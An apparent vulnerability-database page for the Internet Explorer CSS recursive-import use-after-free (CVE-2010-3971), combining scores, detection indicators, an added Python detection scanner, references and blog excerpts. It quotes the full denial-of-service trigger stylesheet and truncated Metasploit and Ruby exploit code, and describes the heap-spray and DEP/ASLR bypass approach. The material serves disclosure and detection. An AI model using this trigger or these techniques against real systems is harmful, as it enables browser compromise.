CVE-2010-3971
Published: 2010-12-22
Priority P274 · critical · 9.3 (CVSS 2.0) · AV:N/AC:M/Au:N/C:C/I:C/A:C
ITW · EXPLOIT · VulnCheck KEV · Exploited in the wild
EPSS: 81.66% (99.6th percentile)
Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability."
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
Detection & IOCs (extracted from sources)
bytes: 0c0c0c0900000008000000730073030100000000010000730073030c
- Detect recursive/self-referential CSS @import rules in HTTP responses: the exploit triggers via a stylesheet that imports itself or imports the same CSS file multiple times.
- Alert on User-Agent strings containing both 'MSIE 6.0/7.0/8.0' and '.NET CLR 2.0.50727': the Metasploit module explicitly requires .NET CLR 2.0.50727 in the UA and aborts otherwise.
- Monitor for HTTP responses serving Content-Type 'text/css' containing multiple '@import url(...)' directives pointing to the same resource, indicative of the recursive import trigger.
- Detect HTML pages served as UTF-16 (BOM 0xFF 0xFE or 0xFE 0xFF) that also load a .NET DLL (Content-Type: application/x-msdownload): the exploit serves a .NET DLL to load mscorie.dll for ROP-based DEP/ASLR bypass.
- Look for heap spray patterns using the byte sequence 0x0c0c0c0c or the specific blob '0c0c0c09000000080000007300730301...' in memory or network captures associated with IE CSS exploitation.
- The Metasploit module uses 'migrate -f' as InitialAutoRunScript; post-exploitation process migration activity should be correlated with prior IE CSS anomalies.
- The ROP chain and base address (0x63f00000) are specific to mscorie.dll version v2.0.50727.3053; exploitation fails if a different .NET 2.0 patch level is installed.
- The Metasploit module explicitly does not opt-in to ASLR and relies on mscorie.dll being a non-ASLR module; systems without .NET 2.0 installed are not exploitable by this module.
- The IE6 target uses the same crash/debug return address (0xc0c0c0c0) as the Debug Target, meaning reliable code execution on IE6 was not implemented in this module version.
- The exploit has no vuln_test capability: the module cannot pre-check whether the target is vulnerable before attempting exploitation.
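The first three detection ideas above (a stylesheet that imports itself, a stylesheet that imports one resource several times, and the IE 6/7/8 plus .NET CLR 2.0.50727 client population) can be implemented as a small response scanner. The following is an added example written for this page, not code from Metasploit, Exploit-DB or any other source quoted here; the sample responses are constructed, the host name example.test is a placeholder, and the function names are my own.

```python
"""Detection helpers for the CVE-2010-3971 trigger: a stylesheet whose @import
rules point back at itself, or repeatedly at one resource.

Added example, not code from any of the sources quoted on this page.
Sample responses at the bottom are constructed, not captured traffic.
"""
import re
from collections import Counter
from urllib.parse import urljoin, urldefrag

# Covers @import url("x"), @import url('x'), @import url(x), @import "x", @import 'x'.
IMPORT_RE = re.compile(
    r"""@import\s+(?:url\(\s*(?:"([^"]*)"|'([^']*)'|([^)\s]*))\s*\)|"([^"]*)"|'([^']*)')""",
    re.IGNORECASE,
)

# Client population the Metasploit module insists on (IE 6/7/8 plus .NET CLR 2.0.50727).
MSIE_RE = re.compile(r"MSIE [678]\.0\b")
CLR2_RE = re.compile(r"\.NET CLR 2\.0\.50727\b")


def find_css_imports(css_text):
    """Return the raw @import targets in order of appearance."""
    return [next(g for g in m.groups() if g is not None)
            for m in IMPORT_RE.finditer(css_text)]


def canonical(base_url, ref):
    """Resolve ref against the stylesheet URL and drop any fragment, so that
    'css.css', './css.css' and 'css.css#x' all compare equal."""
    return urldefrag(urljoin(base_url, ref))[0]


def analyze_stylesheet(url, css_text):
    """Return (self_referential, repeated): whether the sheet imports itself and
    a map of absolute targets imported more than once to their counts."""
    counts = Counter(canonical(url, ref) for ref in find_css_imports(css_text))
    self_referential = counts.get(canonical(url, ""), 0) > 0
    repeated = {target: n for target, n in counts.items() if n > 1}
    return self_referential, repeated


def ie_with_clr2(user_agent):
    """True when the User-Agent advertises IE 6/7/8 together with .NET CLR 2.0.50727."""
    return bool(MSIE_RE.search(user_agent) and CLR2_RE.search(user_agent))


def scan_responses(responses):
    """responses: iterable of dicts with url, content_type, user_agent, body.
    Only text/css bodies are analysed; returns one alert string per finding."""
    alerts = []
    for r in responses:
        if not r["content_type"].lower().startswith("text/css"):
            continue
        self_ref, repeated = analyze_stylesheet(r["url"], r["body"])
        if self_ref:
            alerts.append(f"self-referential @import in {r['url']}")
        for target, n in sorted(repeated.items()):
            alerts.append(f"{r['url']} imports {target} {n} times")
        # Only escalate the client match when the stylesheet itself looked suspicious.
        if (self_ref or repeated) and ie_with_clr2(r.get("user_agent", "")):
            alerts.append(f"IE with .NET CLR 2.0.50727 fetched {r['url']}")
    return alerts


# Constructed sample traffic: one sheet shaped like the public trigger file, one benign sheet.
SAMPLE_RESPONSES = [
    {
        "url": "http://example.test/css.css",
        "content_type": "text/css",
        "user_agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET CLR 2.0.50727)",
        "body": '*{ color:red; }\n' + '@import url("css.css");\n' * 4,
    },
    {
        "url": "http://example.test/site.css",
        "content_type": "text/css",
        "user_agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6",
        "body": '@import url("reset.css");\n@import "print.css";\nbody { margin: 0 }\n',
    },
]

if __name__ == "__main__":
    for alert in scan_responses(SAMPLE_RESPONSES):
        print(alert)
```

The targets are resolved to absolute URLs before counting so that `css.css`, `./css.css` and a fragment-suffixed form are recognised as the same resource; the User-Agent match is only reported alongside a suspicious stylesheet, because on its own it describes a large share of 2010-era clients and would be pure noise.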
CVSS provenance
- nvd · v2.0 · 9.3 CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
- vulncheck · 9.3 CRITICAL
GHSA
GHSA-r6fx-qpgx-pg2w [HIGH]: Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml (ghsa_unreviewed · 2022-05-13)
Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability."
VulnCheck
Microsoft CSS Memory Corruption Vulnerability [CRITICAL] (vulncheck · 2010 · CVSS 9.3)
Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability."
Affected: Microsoft Internet Explorer
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-003
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit) (exploitdb · 2011-02-08)
---
```ruby
##
# $Id: ms11_003_ie_css_import.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
:ua_minver => "7.0", # Should be 6
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer CSS Recursive Import Use After Free',
'Description' => %q{
```
Exploit-DB
Microsoft Internet Explorer 8 - CSS Parser (exploitdb · 2010-12-15)
---
```ruby
#!/usr/bin/env ruby
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)
require 'socket'

def http_send(sock, data, opts={})
  defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
  opts = defaults.merge(opts)
  code = opts[:code]
  message = opts[:message]
  type = opts[:type]
  to_send = "HTTP/1.1 #{code} #{message}\r\n" +
    "Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" +
    "Cache-Control: no-cache\r\n" +
    "Content-Type: #{type}\r\n" +
    "Pragma: no-cache\r\n" +
    "Content-Length: #{data.length}\r\n\r\n" +
    "#{data}"
  puts "[+] Sending:"
  to_send.split("\n").each do |line|
    puts " #{line}"
  end
  sock.write(to_send) rescue return false
  return true
end

def sock_read(sock, out_str, timeout=5)
  beg
```
Exploit-DB
Microsoft Internet Explorer 8 - CSS Parser Denial of Service (exploitdb · 2010-12-08)
---
```css
*{
color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
```
Exploit-DB Notes:
* Original credit goes to an unidentified researcher using WooYun anonymous account "路人甲".
WooYun is a connection platform for vendors and security researchers:
http://www.wooyun.org/bugs/wooyun-2010-0885
* Dec 22, 2010 - Microsoft releases security advisory for this vulnerability:
http://www.microsoft.com/technet/security/advisory/2488013.mspx
Metasploit
MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free (metasploit)
This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.
Krebs
In a Zero-Day World, It’s Active Attacks that Matter – Krebs on Security (blogs_krebs · 2012-10-01)
The recent zero-day vulnerability in Internet Explorer caused many (present company included) to urge Internet users to consider surfing the Web with a different browser until Microsoft issued a patch. Microsoft did so last month, but not before experts who ought to have known better began downplaying such advice, pointing out that other browser makers have more vulnerabilities and just as much exposure to zero-day flaws.
This post examines hard data that shows why such reasoning is more emotional than factual. Unlike Google Chrome and Mozilla Firefox users, IE users were exposed to active attacks against unpatched, critical vulnerabilities for months at a time over the past year and a half.
Attackers exploited zero-day holes in Internet Explorer for at least 89 days over the past 19 mon
Talos
'Tis the Season for 0-days (blogs_talos · 2010-12-23)
Hello, all! This is just a quick note that Microsoft has released a bulletin regarding a new 0-day in Internet Explorer versions 7 and 8. You can read all about it in their advisory at http://www.microsoft.com/technet/security/advisory/2488013.mspx as well as the reference for the CVE, 2010-3971. We have previously released coverage for this vulnerability in sids 18196 and 18240. Because we released coverage before Microsoft posted their bulletin or a CVE had been assigned, these rules do not have those references. We will release updated rules with the new references after the holidays.
In addition to the above CSS issue, two other 0-days have been making the rounds lately that I wanted to call attention to -- a vulnerable Active-X control that allows remote code execution that we defend
Zscaler
Zscaler found Multiple Security Vulnerabilities | 02-08-2011 [CRITICAL] (blogs_zscaler · CVSS 9.3)
References
- http://blogs.technet.com/b/srd/archive/2011/01/07/assessing-the-risk-of-public-issues-currently-being-tracked-by-the-msrc.aspx
- http://seclists.org/fulldisclosure/2010/Dec/110
- http://secunia.com/advisories/42510
- http://support.avaya.com/css/P8/documents/100127294
- http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
- http://www.exploit-db.com/exploits/15708
- http://www.exploit-db.com/exploits/15746
- http://www.kb.cert.org/vuls/id/634956
- http://www.microsoft.com/technet/security/advisory/2488013.mspx
- http://www.securityfocus.com/bid/45246
- http://www.securitytracker.com/id?1024922
- http://www.vupen.com/english/advisories/2010/3156
- http://www.vupen.com/english/advisories/2011/0318
- http://www.wooyun.org/bugs/wooyun-2010-0885
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-003
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12382